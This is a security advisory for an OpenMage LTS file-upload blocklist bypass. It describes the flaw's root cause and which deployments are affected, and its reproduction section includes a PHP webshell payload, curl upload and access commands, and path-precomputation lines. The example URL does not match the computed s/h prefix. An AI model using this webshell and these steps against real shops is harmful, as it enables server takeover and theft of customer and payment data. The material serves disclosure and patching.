CVE-2026-40488

HIGH8.8EPSS 0.09%

OpenMage LTS: Customer File Upload Extension Blocklist Bypass → Remote Code Execution

Published: 4/21/2026Modified: 5/5/2026
Also known as:GHSA-3j5q-7q7h-2hhv

Description

The product custom option file upload in OpenMage LTS uses an incomplete blocklist (`forbidden_extensions = php,exe`) to prevent dangerous file uploads. This blocklist can be trivially bypassed by using alternative PHP-executable extensions such as `.phtml`, `.phar`, `.php3`, `.php4`, `.php5`, `.php7`, and `.pht`. Files are stored in the publicly accessible `media/custom_options/quote/` directory, which lacks server-side execution restrictions for some configurations, enabling Remote Code Execution if this directory is not explicitly denied script execution. ## Affected Version - **Project:** OpenMage/magento-lts - **Vulnerable File:** `https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php` - **Vulnerable Lines:** 230-237 (`_validateUploadedFile()`) - **Configuration:** `app/code/core/Mage/Catalog/etc/config.xml:824` ## Root Cause The file upload handler uses `Zend_File_Transfer_Adapter_Http` directly with `ExcludeExtension` validator, referencing only: ```xml <!-- Catalog/etc/config.xml:824 --> <forbidden_extensions>php,exe</forbidden_extensions> ``` This misses the comprehensive `protected_extensions` blocklist defined elsewhere: ```xml <!-- Core/etc/config.xml:449-478 --> php, php3, php4, php5, php7, htaccess, jsp, pl, py, asp, sh, cgi, htm, html, pht, phtml, shtml ``` ## Vulnerable Code ```php // app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php:230-237 $_allowed = $this->_parseExtensionsString($option->getFileExtension()); if ($_allowed !== null) { $upload->addValidator('Extension', false, $_allowed); } else { $_forbidden = $this->_parseExtensionsString($this->getConfigData('forbidden_extensions')); if ($_forbidden !== null) { $upload->addValidator('ExcludeExtension', false, $_forbidden); // Only blocks php,exe! } } ``` ## Steps to Reproduce ### 1. Environment Setup Target: OpenMage LTS with Apache+mod_php or Apache+PHP-FPM (with .phtml handler) ### 2. Exploitation ```bash # Upload .phtml (bypasses blocklist) curl -X POST "https://target.com/vulnerable_upload.php" \ -F "[email protected];filename=shell.phtml" ``` **Result:** <img width="1563" height="733" alt="image" src="https://github.com/user-attachments/assets/c56d43e8-364a-4402-8198-9f49a50fd691" /> ### 3. Code Execution OpenMage derives the uploaded file's storage path deterministically from two values the attacker already controls: **Subdirectory** — `getDispretionPath($filename)` takes the **first two characters** of the uploaded filename and uses them as nested directory names: ``` filename = "shell.phtml" → s/ h/ → media/custom_options/quote/s/h/ ``` **Filename** — `md5(file_get_contents($tmp_name))` is computed over the **raw bytes of the uploaded payload** (`File.php:245`): ```php // app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php:245 $fileHash = md5(file_get_contents($fileInfo['tmp_name'])); $filePath = $dispersion . DS . $fileHash . '.' . $extension; ``` Because the attacker writes the webshell themselves, both the filename prefix and file contents are known **before the upload request is sent**. The full URL can be pre-computed: ```bash SHELL_CONTENT='<?php echo exec("id"); system($_GET["cmd"]??"id"); ?>\n' HASH=$(echo -n "$SHELL_CONTENT" | md5sum | cut -d' ' -f1) PREFIX=$(echo "shell" | cut -c1-2 | sed 's/./&\//g' | tr -d '\n' | sed 's/\/$//') # → s/h ```bash curl "https://target.com/media/custom_options/quote/d9/bb4d647f16d9e7edfe49216140de2879.phtml" ``` **Result:** RCE Confirmed <img width="1559" height="827" alt="image" src="https://github.com/user-attachments/assets/12990f06-8750-48e6-87c5-add18b9e7260" /> ## Affected Deployments | Configuration | Status | |---------------|--------| | Apache + mod_php (with `php_flag engine 0`) | SAFE | | Apache + PHP-FPM | **VULNERABLE** | | Nginx (reference hardened config) | SAFE | | Nginx (generic config with .phtml→FPM) | **VULNERABLE** | ## Impact 1. **Remote Code Execution:** Full server compromise through webshell upload 2. **Data Exfiltration:** Access to database credentials, customer PII, payment data 3. **Lateral Movement:** Pivot to internal infrastructure 4. **Supply Chain:** Inject malicious code into served content

Affected packages (1)

CVSS scores

SourceVersionSeverityVector
osvCVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
osvCVSS 3.1HIGH8.8CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References (3)